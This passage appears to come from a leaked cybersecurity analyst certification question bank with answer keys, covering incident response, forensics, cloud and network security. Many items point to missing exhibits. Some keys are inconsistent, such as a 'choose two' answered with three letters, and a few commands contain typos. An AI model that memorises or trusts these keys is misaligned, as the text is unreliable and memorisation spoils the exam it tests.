Based on this information, which of the following accounts was MOST likely compromised?
A. CARLB
B. CINDYP
C. GILLIANO
D. ANDREAD
E. LAURAB
Correct Answer: D
QUESTION 86
An organization wants to ensure the privacy of the data that is on its systems. Full disk encryption and DLP are already in use. Which of the following is
the BEST option?
A. Require all remote employees to sign an NDA.

B. Enforce geofencing to limit data accessibility.
C. Require users to change their passwords more frequently.
D. Update the AUP to restrict data sharing.
Correct Answer: B
QUESTION 87
An organization has specific technical risk mitigation configurations that must be implemented before a new server can be approved for production.
Several critical servers were recently deployed with the antivirus missing, unnecessary ports disabled, and insufficient password complexity. Which of
the following should the analyst recommend to prevent a recurrence of this risk exposure?
A. Perform password-cracking attempts on all devices going into production

B. Perform an Nmap scan on all devices before they are released to production
C. Perform antivirus scans on all devices before they are approved for production
D. Perform automated security controls testing of expected configurations prior to production
Correct Answer: D
QUESTION 88
Which of the following attack techniques has the GREATEST likelihood of quick success against Modbus assets?
A. Remote code execution

B. Buffer overflow
C. Unauthenticated commands
D. Certificate spoofing
Correct Answer: C
QUESTION 89
A company's Chief Information Officer wants to use a CASB solution to ensure policies are being met during cloud access. Due to the nature of the
company's business and risk appetite, the management team elected to not store financial information in the cloud. A security analyst needs to
recommend a solution to mitigate the threat of financial data leakage into the cloud. Which of the following should the analyst recommend?
A. Utilize the CASB to enforce DLP data-at-rest protection for financial information that is stored on premises.
B. Do not utilize the CASB solution for this purpose, but add DLP on premises for data in motion.
C. Utilize the CASB to enforce DLP data-in-motion protection for financial information moving to the cloud.
D. Do not utilize the CASB solution for this purpose, but add DLP on premises for data at rest.
Correct Answer: C
QUESTION 90
A security administrator needs to provide access from partners to an isolated laboratory network inside an organization that meets the following
requirements:
* The partners' PCs must not connect directly to the laboratory network
* The tools the partners need to access while on the laboratory network must be available to all partners
* The partners must be able to run analyses on the laboratory network, which may take hours to complete
Which of the following capabilities will MOST likely meet the security objectives of the request?
A. Deployment of a jump box to allow access to the laboratory network and use of VDI in persistent mode to provide the necessary tools for analysis
B. Deployment of a firewall to allow access to the laboratory network and use of VDI in non-persistent mode to provide the necessary tools for analysis
C. Deployment of a firewall to allow access to the laboratory network and use of VDI in persistent mode to provide the necessary tools for analysis
D. Deployment of a jump box to allow access to the laboratory network and use of VDI in non-persistent mode to provide the necessary tools for
analysis
Correct Answer: A
QUESTION 91
The incident response team is working with a third-party forensic specialist to investigate the root cause of a recent intrusion. An analyst was asked to
submit sensitive network design details for review. The forensic specialist recommended electronic delivery for efficiency, but email was not an approved
communication channel to send network details. Which of the following BEST explains the importance of using a secure method of communication
during incident response?
A. To prevent adversaries from intercepting response and recovery details

B. To ensure intellectual property remains on company servers
C. To have a backup plan in case email access is disabled
D. To ensure the management team has access to all the details that are being exchanged
Correct Answer: A
QUESTION 92
According to a static analysis report for a web application, a dynamic code evaluation script injection vulnerability was found. Which of the following
actions is the BEST option to fix the vulnerability in the source code?
A. Delete the vulnerable section of the code immediately.

B. Create a custom rule on the web application firewall.
C. Validate user input before execution and interpretation.
D. Use parameterized queries.
Correct Answer: C
QUESTION 93
A security analyst has discovered malware is spreading across multiple critical systems and is originating from a single workstation, which belongs to a
member of the cyberinfrastructure team who has legitimate administrator credentials. An analysis of the traffic indicates the workstation swept the
network looking for vulnerable hosts to infect. Which of the following would have worked BEST to prevent the spread of this infection?
A. Vulnerability scans of the network and proper patching

B. A properly configured and updated EDR solution
C. A honeynet used to catalog the anomalous behavior and update the IPS
D. Logical network segmentation and the use of jump boxes
Correct Answer: D
QUESTION 94
Which of the following BEST identifies the appropriate use of threat intelligence as a function of detection and response?
A. To identify weaknesses in an organization's security posture

B. To identify likely attack scenarios within an organization
C. To build a business continuity plan for an organization
D. To build a network segmentation strategy
Correct Answer: B
QUESTION 95
A security analyst on the threat-hunting team has developed a list of unneeded, benign services that are currently running as part of the standard OS
deployment for workstations. The analyst will provide this list to the operations team to create a policy that will automatically disable the services for all
workstations in the organization. Which of the following BEST describes the security analyst's goal?
A. To create a system baseline

B. To reduce the attack surface
C. To optimize system performance
D. To improve malware detection
Correct Answer: B
QUESTION 96
A cybersecurity analyst is supporting an incident response effort via threat intelligence. Which of the following is the analyst MOST likely executing?
A. Requirements analysis and collection planning

B. Containment and eradication
C. Recovery and post-incident review
D. Indicator enrichment and research pivoting
Correct Answer: D
QUESTION 97
A security analyst has received reports of very slow, intermittent access to a public-facing corporate server. Suspecting the system may be
compromised, the analyst runs the following commands:
Based on the output from the above commands, which of the following should the analyst do NEXT to further the investigation?
A. Run crontab -r; rm -rf /tmp/.t to remove and disable the malware on the system.
B. Examine the server logs for further indicators of compromise of a web application.
C. Run kill -9 1325 to bring the load average down so the server is usable again.
D. Perform a binary analysis on the /tmp/.t/t file, as it is likely to be a rogue SSHD server.
Correct Answer: B
QUESTION 98
An analyst receives an alert from the continuous-monitoring solution about unauthorized changes to the firmware versions on several field devices. The
asset owners confirm that no firmware version updates were performed by authorized technicians, and customers have not reported any performance
issues or outages.
Which of the following actions would be BEST for the analyst to recommend to the asset owners to secure the devices from further exploitation?
A. Change the passwords on the devices.

B. Implement BIOS passwords.
C. Remove the assets from the production network for analysis.
D. Report the findings to the threat intel community.
Correct Answer: C
QUESTION 99
An organization has not had an incident for several months. The Chief Information Security Officer wants to move to a more proactive stance for security
investigations. Which of the following would BEST meet that goal?
A. Root-cause analysis
B. Active response
C. Advanced antivirus
D. Information-sharing community
E. Threat hunting
Correct Answer: E
QUESTION 100
Massivelog.log has grown to 40GB on a Windows server. At this size, local tools are unable to read the file, and it cannot be moved off the virtual server
where it is located. Which of the following lines of PowerShell script will allow a user to extract the last 10,000 lines of the log for review?
A. tail -10000 Massivelog.log > extract.txt

B. info tail n -10000 Massivelog.log | extract.txt;
C. get content './Massivelog.log' -Last 10000 | extract.txt
D. get-content './Massivelog.log' -Last 10000 > extract.txt;
Correct Answer: D
QUESTION 101
A cybersecurity analyst is establishing a threat-hunting and intelligence group at a growing organization. Which of the following is a collaborative
resource that would MOST likely be used for this purpose?
A. IoC feeds
B. CVSS scores
C. Scrum
D. ISAC
Correct Answer: D
QUESTION 102
Which of the following are considered PI I by themselves? (Choose two.)
A. Government ID
B. Job title
C. Employment start date
D. Birth certificate
E. Employer address
F. Mother's maiden name
Correct Answer: AD
QUESTION 103
A security analyst needs to provide the development team with secure connectivity from the corporate network to a three-tier cloud environment. The
developers require access to servers in all three tiers in order to perform various configuration tasks. Which of the following technologies should the
analyst implement to provide secure transport?
A. CASB
B. VPC
C. Federation
D. VPN
Correct Answer: D
QUESTION 104
A security analyst reviews a recent network capture and notices encrypted inbound traffic on TCP port 465 was coming into the company's network from
a database server. Which of the following will the security analyst MOST likely identify as the reason for the traffic on this port?
A. The server is configured to communicate on the secure database standard listener port.
B. Someone has configured an unauthorized SMTP application over SSL.
C. A connection from the database to the web front end is communicating on the port.
D. The server is receiving a secure connection using the new TLS 1.3 standard.
Correct Answer: B
QUESTION 105
A security analyst reviews the following aggregated output from an Nmap scan and the border firewall ACL:
Which of the following should the analyst reconfigure to BEST reduce organizational risk while maintaining current functionality?
A. PC1
B. PC2
C. Server1
D. Server2
E. Firewall
Correct Answer: E
QUESTION 106
The help desk is having difficulty keeping up with all onboarding and offboarding requests. Managers often submit requests for new users at the last
minute, causing the help desk to scramble to create accounts across many different interconnected systems. Which of the following solutions would
work BEST to assist the help desk with the onboarding and offboarding process while protecting the company's assets?
A. MFA
B. CASB
C. SSO
D. RBAC
Correct Answer: D
QUESTION 107
Which of the following is MOST important when developing a threat hunting program?
A. Understanding penetration testing techniques

B. Understanding how to build correlation rules within a SIEM
C. Understanding security software technologies
D. Understanding assets and categories of assets
Correct Answer: D
QUESTION 108
A cybersecurity analyst needs to rearchitect the network using a firewall and a VPN server to achieve the highest level of security. To BEST complete
this task, the analyst should place the:
A. firewall behind the VPN server.

B. VPN server parallel to the firewall
C. VPN server behind the firewall.
D. VPN on the firewall.
Correct Answer: C
QUESTION 109
An executive assistant wants to onboard a new cloud-based product to help with business analytics and dashboarding. Which of the following would be
the BEST integration option for this service?
A. Manually log in to the service and upload data files on a regular basis.
B. Have the internal development team script connectivity and file transfers to the new service.
C. Create a dedicated SFTP site and schedule transfers to ensure file transport security.
D. Utilize the cloud product's API for supported and ongoing integrations.
Correct Answer: D
QUESTION 110
An information security analyst discovered a virtual machine server was compromised by an attacker. Which of the following should be the FIRST steps
to confirm and respond to the incident? (Choose two.)
A. Pause the virtual machine.
B. Shut down the virtual machine.

C. Take a snapshot of the virtual machine.
D. Remove the NIC from the virtual machine.
E. Review host hypervisor log of the virtual machine.
F. Execute a migration of the virtual machine.
Correct Answer: ACD
QUESTION 111
The security team decides to meet informally to discuss and test their response plan for potential security breaches and emergency situations. Which of
the following types of training will the security team perform?
A. Tabletop exercise
B. Red-team attack
C. System assessment implementation
D. Blue-team training
E. White-team engagement
Correct Answer: A
QUESTION 112
Which of the following BEST explains the function of TPM?
A. To provide hardware-based security features using unique keys

B. To ensure platform confidentiality by storing security measurements
C. To improve management of the OS Installations
D. To implement encryption algorithms for hard drives
Correct Answer: A
QUESTION 113
A security analyst is investigating an incident related to an alert from the threat detection platform on a host (10.0.1.25) in a staging environment that
could be running a cryptomining tool because it is sending traffic to an IP address that is related to Bitcoin. The network rules for the instance are the
following:
Which of the following is the BEST way to isolate and triage the host?
A. Remove rules 1, 2, and 3.

B. Remove rules 1, 2, 4, and 5.
C. Remove rules 1, 2, 3, 4, and 5.
D. Remove rules 1. 2, and 5.
E. Remove rules 1, 4, and 5.
F. Remove rules 4 and 5.
Correct Answer: D
QUESTION 114
Which of the following BEST describes what an organization's incident response plan should cover regarding how the organization handles public or
private disclosures of an incident?
A. The disclosure section should focus on how to reduce the likelihood customers will leave due to the incident.
B. The disclosure section should contain the organization's legal and regulatory requirements regarding disclosures.
C. The disclosure section should include the names and contact information of key employees who are needed for incident resolution.
D. The disclosure section should contain language explaining how the organization will reduce the likelihood of the incident from happening in the
future.
Correct Answer: B
QUESTION 115
An organization has the following policy statements:
All emails entering or leaving the organization will be subject to inspection for malware, policy violations, and unauthorized content.
All network activity will be logged and monitored.
Confidential data will be tagged and tracked.
Confidential data must never be transmitted in an unencrypted form. Confidential data must never be stored on an unencrypted mobile device. Which of
the following is the organization enforcing?
A. Acceptable use policy

B. Data privacy policy
C. Encryption policy
D. Data management policy
Correct Answer: D
QUESTION 116
An organization has the following risk mitigation policies:
Risks without compensating controls will be mitigated first if the risk value is greater than $50,000.
Other risk mitigation will be prioritized based on risk value.
The following risks have been identified:
Which of the following is the order of priority for risk mitigation from highest to lowest?
A. A, C, D, B
B. B. C, D, A
C. C, B, A, D
D. C, D, A, B
E. D, C, B, A
Correct Answer: C
QUESTION 117
After examining a header and footer file, a security analyst begins reconstructing files by scanning the raw data bytes of a hard disk and rebuilding them.
Which of the following techniques is the analyst using?
A. Header analysis
B. File carving
C. Metadata analysis
D. Data recovery
Correct Answer: B
QUESTION 118
In SIEM software, a security analyst detected some changes to hash signatures from monitored files during the night followed by SMB brute-force
attacks against the file servers. Based on this behavior, which of the following actions should be taken FIRST to prevent a more serious compromise?
A. Fully segregate the affected servers physically in a network segment, apart from the production network.
B. Collect the network traffic during the day to understand if the same activity is also occurring during business hours.
C. Check the hash signatures, comparing them with malware databases to verify if the files are infected.
D. Collect all the files that have changed and compare them with the previous baseline.
Correct Answer: A
QUESTION 119
While monitoring the information security notification mailbox, a security analyst notices several emails were reported as spam. Which of the following
should the analyst do FIRST?
A. Block the sender in the email gateway.

B. Delete the email from the company's email servers.
C. Ask the sender to stop sending messages.
D. Review the message in a secure environment.
Correct Answer: D
QUESTION 120
While implementing a PKI for a company, a security analyst plans to utilize a dedicated server as the certificate authority that is only used to sign
intermediate certificates. Which of the following are the MOST secure states for the certificate authority server when it is not in use? (Choose two.)
A. On a private VLAN
B. Full disk encrypted
C. Powered off
D. Backed up hourly
E. VPN accessible only
F. Air gapped
Correct Answer: CF
QUESTION 121
While conducting a cloud assessment, a security analyst performs a Prowler scan, which generates the following within the report:
Based on the Prowler report, which of the following is the BEST recommendation?
A. Delete CloudDev access key 1.

B. Delete BusinessUsr access key 1.
C. Delete access key 1.
D. Delete access key 2.
Correct Answer: B
QUESTION 122
After receiving reports of high latency, a security analyst performs an Nmap scan and observes the following output:
Which of the following suggests the system that produced this output was compromised?
A. Secure shell is operating on a non-standard port.

B. There are no indicators of compromise on this system.
C. MySQL service is identified on a standard PostgreSQL port.
D. Standard HTTP is open on the system and should be closed.
Correct Answer: A
QUESTION 123
An organization prohibits users from logging in to the administrator account. If a user requires elevated permissions, the user's account should be part of
an administrator group, and the user should escalate permission only as needed and on a temporary basis. The organization has the following reporting
priorities when reviewing system activity:
Successful administrator login reporting priority `" high Failed administrator login reporting priority `" medium Failed temporary elevated permissions `"
low
Successful temporary elevated permissions `" non-reportable A security analyst is reviewing server syslogs and sees the following:
Which of the following events is the HIGHEST reporting priority?
A. <100>2 2020-01-10T20:36:01.010Z financeserver sudo 201 32001 - BOM 'sudo vi users.txt' success
B. <100>2 2020-01-10T21:18:34.002Z adminserver sudo 201 32001 - BOM 'sudo more /etc/passwords' success
C. <100>2 2020-01-10T19:33:48.002Z webserver su 201 32001 - BOM 'su' success
D. <100>2 2020-01-10T21:53:11.002Z financeserver su 201 32001 - BOM 'su vi syslog.conf failed for joe
Correct Answer: C
QUESTION 124
An incident response team detected malicious software that could have gained access to credit card data. The incident response team was able to
mitigate significant damage and implement corrective actions. By having incident response mechanisms in place, which of the following should be
notified for lessons learned?
A. The human resources department

B. Customers
C. Company leadership
D. The legal team
Correct Answer: C
QUESTION 125
When investigating a report of a system compromise, a security analyst views the following /var/log/secure log file:
Which of the following can the analyst conclude from viewing the log file?
A. The comptia user knows the sudo password.

B. The comptia user executed the sudo su command.
C. The comptia user knows the root password.
D. The comptia user added himself or herself to the /etc/sudoers file.
Correct Answer: C
QUESTION 126
A security analyst is reviewing the following server statistics:
Which of the following is MOST likely occurring?
A. Race condition
B. Privilege escalation
C. Resource exhaustion
D. VM escape
Correct Answer: C
QUESTION 127
A company has started planning the implementation of a vulnerability management procedure. However, its security maturity level is low. So there are
some prerequisites to complete before risk calculation and prioritization. Which of the following should be completed FIRST?
A. A business impact analysis

B. A system assessment
C. Communication of the risk factors
D. A risk identification process
Correct Answer: B
QUESTION 128
An organization is experiencing security incidents in which a systems administrator is creating unauthorized user accounts. A security analyst has
created a script to snapshot the system configuration each day. Following is one of the scripts: cat /etc/passwd > daily_$(date +"%m_%d_%Y")
This script has been running successfully every day. Which of the following commands would provide the analyst with additional useful information
relevant to the above script?
A. diff daily_11_03_2019 daily_11_04_2019

B. ps "ef | grep admin > daily_process_$(date +%m_%d_%Y")
C. more /etc/passwd > daily_$(date +%m_%d_%Y_%H:%M:%S")
D. la "lai /usr/sbin > daily_applications
Correct Answer: A
QUESTION 129
A routine vulnerability scan detected a known vulnerability in a critical enterprise web application. Which of the following would be the BEST next step?
A. Submit a change request to have the system patched.

B. Evaluate the risk and criticality to determine if further action is necessary.
C. Notify a manager of the breach and initiate emergency procedures.
D. Remove the application from production and inform the users.
Correct Answer: B
QUESTION 130
A manufacturing company uses a third-party service provider for Tier 1 security support. One of the requirements is that the provider must only source
talent from its own country due to geopolitical and national security interests. Which of the following can the manufacturing company implement to
ensure the third-party service provider meets this requirement?
A. Implement a secure supply chain program with governance.

B. Implement blacklisting for IP addresses from outside the country
C. Implement strong authentication controls for all contractors.
D. Implement user behavior analytics for key staff members.
Correct Answer: A
QUESTION 131
A Chief Information Security Officer has asked for a list of hosts that have critical and high- severity findings as referenced in the CVE database. Which
of the following tools would produce the assessment output needed to satisfy this request?
A. Nessus
B. Nikto
C. Fuzzer
D. Wireshark
E. Prowler
Correct Answer: A
QUESTION 132
A team of security analysts has been alerted to potential malware activity. The initial examination indicates one of the affected workstations is beaconing
on TCP port 80 to five IP addresses and attempting to spread across the network over port 445. Which of the following should be the team's NEXT step
during the detection phase of this response process?
A. Escalate the incident to management, who will then engage the network infrastructure team to keep them informed.
B. Depending on system criticality, remove each affected device from the network by disabling wired and wireless connections.
C. Engage the engineering team to block SMB traffic internally and outbound HTTP traffic to the five IP addresses.
D. Identify potentially affected systems by creating a correlation search in the SIEM based on the network traffic.
Correct Answer: D
QUESTION 133
An organization is developing software to match customers' expectations. Before the software goes into production, it must meet the following quality
assurance guidelines:
Uncover all the software vulnerabilities.
Safeguard the interest of the software's end users. Reduce the likelihood that a defective program will enter production.
Preserve the interests of the software producer.
Which of the following should be performed FIRST?
A. Run source code against the latest OWASP vulnerabilities.

B. Document the life-cycle changes that took place.
C. Ensure verification and validation took place during each phase.
D. Store the source code in a software escrow.
E. Conduct a static analysis of the code.
Correct Answer: E
QUESTION 134
Which of the following APT adversary archetypes represent non-nation-state threat actors? (Choose two.)
A. Kitten
B. Panda
C. Tiger
D. Jackal
E. Bear
F. Spider
Correct Answer: DF
QUESTION 135
A cybersecurity analyst is implementing a new network configuration on an existing network access layer to prevent possible physical attacks. Which of
the following BEST describes a solution that would apply and cause fewer issues during the deployment phase?
A. Implement port security with one MAC address per network port of the switch.
B. Deploy network address protection with DHCP and dynamic VLANs
C. Configure 802.1X and EAPOL across the network.
D. Implement software-defined networking and security groups for isolation.
Correct Answer: A
QUESTION 136
Which of the following types of controls defines placing an ACL on a file folder?
A. Technical control
B. Confidentiality control
C. Managerial control
D. Operational control
Correct Answer: A
QUESTION 137
Which of the following BEST explains the function of trusted firmware updates as they relate to hardware assurance?
A. Trusted firmware updates provide organizations with development, compilation, remote access, and customization for embedded devices.
B. Trusted firmware updates provide organizations with security specifications, open- source libraries, and custom tools for embedded devices.
C. Trusted firmware updates provide organizations with remote code execution, distribution, maintenance, and extended warranties for embedded
devices.
D. Trusted firmware updates provide organizations with secure code signing, distribution, installation, and attestation for embedded devices.
Correct Answer: D
QUESTION 138
After detecting possible malicious external scanning, an internal vulnerability scan was performed, and a critical server was found with an outdated
version of JBoss. A legacy application that is running depends on that version of JBoss. Which of the following actions should be taken FIRST to prevent
server compromise and business disruption at the same time?
A. Make a backup of the server and update the JBoss server that is running on it.
B. Contact the vendor for the legacy application and request an updated version.
C. Create a proper DMZ for outdated components and segregate the JBoss server.
D. Apply virtualization over the server, using the new platform to provide the JBoss service for the legacy application as an external service.
Correct Answer: C
QUESTION 139
A company's application development has been outsourced to a third-party development team. Based on the SLA, the development team must follow
industry best practices for secure coding. Which of the following is the BEST way to verify this agreement?
A. Input validation
B. Security regression testing
C. Application fuzzing
D. User acceptance testing
E. Stress testing
Correct Answer: C
QUESTION 140
During the security assessment of a new application, a tester attempts to log in to the application but receives the following message: incorrect
password for given username. Which of the following can the tester recommend to decrease the likelihood that a malicious attacker will receive helpful
information?
A. Set the web page to redirect to an application support page when a bad password is entered.
B. Disable error messaging for authentication.
C. Recognize that error messaging does not provide confirmation of the correct element of authentication.
D. Avoid using password-based authentication for the application.
Correct Answer: B
QUESTION 141
A security analyst is reviewing the following Internet usage trend report:
Which of the following usernames should the security analyst investigate further?
A. User 1
B. User 2
C. User 3
D. User 4
Correct Answer: B
QUESTION 142
An analyst is responding to an incident involving an attack on a company-owned mobile device that was being used by an employee to collect data from
clients in the field. Malware was loaded on the device via the installation of a third-party software package. The analyst has baselined the device. Which
of the following should the analyst do to BEST mitigate future attacks?
A. Implement MDM.
B. Update the malware catalog.
C. Patch the mobile device's OS.
D. Block third-party applications.
Correct Answer: A
QUESTION 143
A security analyst at example.com receives SIEM alert for an IDS signature and reviews the associated packet capture and TCP stream:
Packet capture:
TCP stream:
Which of the following actions should the security analyst take NEXT?
A. Review the known Apache vulnerabilities to determine if a compromise actually occurred.

B. Contact the application owner for connect.example.local for additional information.
C. Mark the alert as a false positive scan coming from an approved source.
D. Raise a request to the firewall team to block 203.0.113.15.
Correct Answer: C
QUESTION 144
A company's domain has been spoofed in numerous phishing campaigns. An analyst needs to determine why the company is a victim of domain
spoofing, despite having a DMARC record that should tell mailbox providers to ignore any email that fails DMARC. Upon review of the record, the
analyst finds the following: v=DMARC1; p=none; fo=0; rua=mailto:security@company.com; ruf=mailto:security@company.com; adkim=r; rf=afrf;
ri=86400;
Which of the following BEST explains the reason why the company's requirements are not being processed correctly by mailbox providers?
A. The DMARC record's DKIM alignment tag is incorrectly configured.

B. The DMARC record's policy tag is incorrectly configured.
C. The DMARC record does not have an SPF alignment tag.
D. The DMARC record's version tag is set to DMARC1 instead of the current version, which is DMARC3.
Correct Answer: B
QUESTION 145
A company experienced a security compromise due to the inappropriate disposal of one of its hardware appliances. Sensitive information stored on the
hardware appliance was not removed prior to disposal. Which of the following is the BEST manner in which to dispose of the hardware appliance?
A. Ensure the hardware appliance has the ability to encrypt the data before disposing of it.
B. Dispose of all hardware appliances securely, thoroughly, and in compliance with company policies.
C. Return the hardware appliance to the vendor, as the vendor is responsible for disposal.
D. Establish guidelines for the handling of sensitive information.
Correct Answer: B
QUESTION 146
During a review of the vulnerability scan results on a server, an information security analyst notices the following:
The MOST appropriate action for the analyst to recommend to developers is to change the web server so:
A. it only accepts TLSv1 .2.

B. it only accepts cipher suites using AES and SHA.
C. it no longer accepts the vulnerable cipher suites.
D. SSL/TLS is offloaded to a WAF and load balancer.
Correct Answer: C
QUESTION 147
A threat hunting team received a new IoC from an ISAC that follows a threat actor's profile and activities. Which of the following should be updated
NEXT?
A. The whitelist
B. The DNS
C. The blocklist
D. The IDS signature
Correct Answer: D
QUESTION 148
A security analyst discovers a standard user has unauthorized access to the command prompt, PowerShell, and other system utilities. Which of the
following is the BEST action for the security analyst to take?
A. Disable the appropriate settings in the administrative template of the Group Policy.
B. Use AppLocker to create a set of whitelist and blacklist rules specific to group membership.
C. Modify the registry keys that correlate with the access settings for the System32 directory.
D. Remove the user's permissions from the various system executables.
Correct Answer: A
QUESTION 149
The Chief Information Officer of a large cloud software vendor reports that many employees are falling victim to phishing emails because they appear to
come from other employees. Which of the following would BEST prevent this issue?
A. Include digital signatures on messages originating within the company.

B. Require users to authenticate to the SMTP server.
C. Implement DKIM to perform authentication that will prevent the issue.
D. Set up an email analysis solution that looks for known malicious links within the email.
Correct Answer: C
QUESTION 150
A security analyst needs to provide a copy of a hard drive for forensic analysis. Which of the following would allow the analyst to perform the task?
A. dcfldd if=/dev/one of=/mnt/usb/evidence.bin hash=md5, sha1 hashlog=/mnt/usb/evidence.bin.hashlog

B. dd if=/dev/sda of=/mnt/usb/evidence.bin bs=4096; sha5l2sum /mnt/usb/evidence.bin > /mnt/usb/evidence.bin.hash
C. tar -zcf /mnt/usb/evidence.tar.gz / -except /mnt; sha256sum /mnt/usb/evidence.tar.gz > /mnt/usb/evidence.tar.gz.hash
D. find / -type f -exec cp {} /mnt/usb/evidence/ \; sha1sum /mnt/usb/evidence/* > /mnt/usb/evidence/evidence.hash
Correct Answer: B
QUESTION 151
A Chief Information Security Officer (CISO) is concerned developers have too much visibility into customer data. Which of the following controls should
be implemented to BEST address these concerns?
A. Data masking
C. Data minimization
D. Data sovereignty
Correct Answer: A
QUESTION 152
During a forensic investigation, a security analyst reviews some Session Initiation Protocol packets that came from a suspicious IP address. Law
enforcement requires access to a VoIP call that originated from the suspicious IP address. Which of the following should the analyst use to accomplish
this task?
A. Wireshark
B. iptables
C. Tcp dump
D. Net flow
Correct Answer: A
QUESTION 153
A security team has begun updating the risk management plan, incident response plan, and system security plan to ensure compliance with security
review guidelines. Which of the following can be executed by internal managers to simulate and validate the proposed changes?
A. Internal management review

B. Control assessment
C. Tabletop exercise
D. Peer review
Correct Answer: C
QUESTION 154
A small electronics company decides to use a contractor to assist with the development of a new FPGA-based device. Several of the development
phases will occur off-site at the contractor's labs. Which of the following is the main concern a security analyst should have with this arrangement?
A. Making multiple trips between development sites increases the chance of physical damage to the FPGAs.
B. Moving the FPGAs between development sites will lessen the time that is available for security testing.
C. Development phases occurring at multiple sites may produce change management issues.
D. FPGA applications are easily cloned, increasing the possibility of intellectual property theft.
Correct Answer: D
QUESTION 155
A security analyst needs to reduce the overall attack surface. Which of the following infrastructure changes should the analyst recommend?
A. Implement a honeypot.
B. Air gap sensitive systems.
C. Increase the network segmentation.
D. Implement a cloud-based architecture.
Correct Answer: C
QUESTION 156
A company's security team recently discovered a number of workstations that are at the end of life. The workstation vendor informs the team that the
product is no longer supported, and patches are no longer available. The company is not prepared to cease its use of these workstations. Which of the
following would be the BEST method to protect these workstations from threats?
A. Deploy whitelisting to the identified workstations to limit the attack surface.

B. Determine the system process criticality and document it.
C. Isolate the workstations and air gap them when it is feasible.
D. Increase security monitoring on the workstations.
Correct Answer: C
QUESTION 157
A small business does not have enough staff in the accounting department to segregate duties. The comptroller writes the checks for the business and
reconciles them against the ledger. To ensure there is no fraud occurring, the business conducts quarterly reviews in which a different officer in the
business compares all the cleared checks against the ledger. Which of the following BEST describes this type of control?
A. Deterrent
B. Preventive
C. Compensating
D. Detective
Correct Answer: D
QUESTION 158
A company offers a hardware security appliance to customers that provides remote administration of a device on the customer's network. Customers
are not authorized to alter the configuration. The company deployed a software process to manage unauthorized changes to the appliance, log them,
and forward them to a central repository for evaluation. Which of the following processes is the company using to ensure the appliance is not altered
from its original configured state?
A. CI/CD
B. Software assurance
C. Anti-tamper
D. Change management
Correct Answer: D
QUESTION 159
During an incident, it is determined that a customer database containing email addresses, first names, and last names was exfiltrated. Which of the
following should the security analyst do NEXT?
A. Consult with the legal department for regulatory impact.

B. Encrypt the database with available tools.
C. Email the customers to inform them of the breach.
D. Follow the incident communications process.
Correct Answer: D
QUESTION 160
As part of the senior leadership team's ongoing risk management activities, the Chief Information Security Officer has tasked a security analyst with
coordinating the right training and testing methodology to respond to new business initiatives or significant changes to existing ones. The management
team wants to examine a new business process that would use existing infrastructure to process and store sensitive data. Which of the following would
be appropriate for the security analyst to coordinate?
A. A black-box penetration testing engagement

B. A tabletop exercise
C. Threat modeling
D. A business impact analysis
Correct Answer: D
QUESTION 161
Which of the following BEST describes how logging and monitoring work when entering into a public cloud relationship with a service provider?
A. Logging and monitoring are not needed in a public cloud environment.

B. Logging and monitoring are done by the data owners.
C. Logging and monitoring duties are specified in the SLA and contract.
D. Logging and monitoring are done by the service provider.
Correct Answer: C
QUESTION 162
During a review of recent network traffic, an analyst realizes the team has seen this same traffic multiple times in the past three weeks, and it resulted in
confirmed malware activity. The analyst also notes there is no other alert in place for this traffic. After resolving the security incident, which of the
following would be the BEST action for the analyst to take to increase the chance of detecting this traffic in the future?
A. Share details of the security incident with the organization's human resources management team.
B. Note the security incident so other analysts are aware the traffic is malicious.
C. Communicate the security incident to the threat team for further review and analysis.
D. Report the security incident to a manager for inclusion in the daily report.
Correct Answer: C
QUESTION 163
An organization's internal department frequently uses a cloud provider to store large amounts of sensitive data. A threat actor has deployed a virtual
machine to attack another virtual machine to gain access to the data. Through the use of the cloud host's hypervisor, the threat actor has escalated the
access rights. Which of the following actions would be BEST to remediate the vulnerability the attacker has used to exploit the system?
A. Sandbox the virtual machine.

B. Implement an MFA solution.
C. Update to the secure hypervisor version.
D. Implement dedicated hardware for each customer.
Correct Answer: C
QUESTION 164
At which of the following phases of the SDLC should security FIRST be involved?
A. Design
B. Maintenance
C. Implementation
D. Analysis
E. Planning
F. Testing
Correct Answer: E
QUESTION 165
During routine monitoring, a security analyst identified the following enterprise network traffic:
Packet capture output:
Which of the following BEST describes what the security analyst observed?
A. 66.187.224.210 set up a DNS hijack with 192.168.12.21.

B. 192.168.12.21 made a TCP connection to 66.187.224.210.
C. 192.168.12.21 made a TCP connection to 209.132.177.50.
D. 209.132.177.50 set up a TCP reset attack to 192.168.12.21.
Correct Answer: C
QUESTION 166
Due to a rise in cyber attackers seeking PHI, a healthcare company that collects highly sensitive data from millions of customers is deploying a solution
that will ensure the customers' data is protected by the organization internally and externally. Which of the following countermeasures can BEST prevent
the loss of customers' sensitive data?
A. Implement privileged access management.

B. Implement a risk management process.
C. Implement multifactor authentication.
D. Add more security resources to the environment.
Correct Answer: A
QUESTION 167
A cybersecurity analyst needs to harden a server that is currently being used as a web server. The server needs to be accessible when entering
www.company.com into the browser. Additionally, web pages require frequent updates, which are performed by a remote contractor. Given the following
output:
Which of the following should the cybersecurity analyst recommend to harden the server? (Choose two.)
A. Uninstall the DNS service

B. Perform a vulnerability scan.
C. Change the server's IP to a private IP address.
D. Disable the Telnet service.
E. Block port 80 with the host-based firewall.
F. Change the SSH port to a non-standard port.
Correct Answer: AD
QUESTION 168
A financial organization has offices located globally. Per the organization's policies and procedures, all executives who conduct business overseas must
have their mobile devices checked for malicious software or evidence of tampering upon their return. The information security department oversees this
process, and no executive has had a device compromised. The Chief Information Security Officer wants to implement an additional safeguard to protect
the organization's data.
Which of the following controls would work BEST to protect the privacy of the data if a device is stolen?
A. Implement a mobile device wiping solution for use once the device returns home.
B. Install a DLP solution to track data flow.
C. Install an encryption solution on all mobile devices.
D. Train employees to report a lost or stolen laptop to the security department immediately.
Correct Answer: C
QUESTION 169
The majority of a company's employees have stated they are unable to perform their job duties due to outdated workstations, so the company has
decided to institute BYOD. Which of the following would a security analyst MOST likely recommend for securing the proposed solution?
A. A Linux-based system and mandatory training on Linux for all BYOD users
B. A firewalled environment for client devices and a secure VDI for BYOD users
C. A standardized anti-malware platform and a unified operating system vendor
D. 802.1X to enforce company policy on BYOD user hardware
Correct Answer: B
QUESTION 170
A security analyst is correlating, ranking, and enriching raw data into a report that will be interpreted by humans or machines to draw conclusions and
create actionable recommendations. Which of the following steps in the intelligence cycle is the security analyst performing?
A. Analysis and production

B. Processing and exploitation
C. Dissemination and evaluation
D. Data collection
E. Planning and direction
Correct Answer: A
QUESTION 171
Some hard disks need to be taken as evidence for further analysis during an incident response. Which of the following procedures must be completed
FIRST for this type of evidence acquisition?
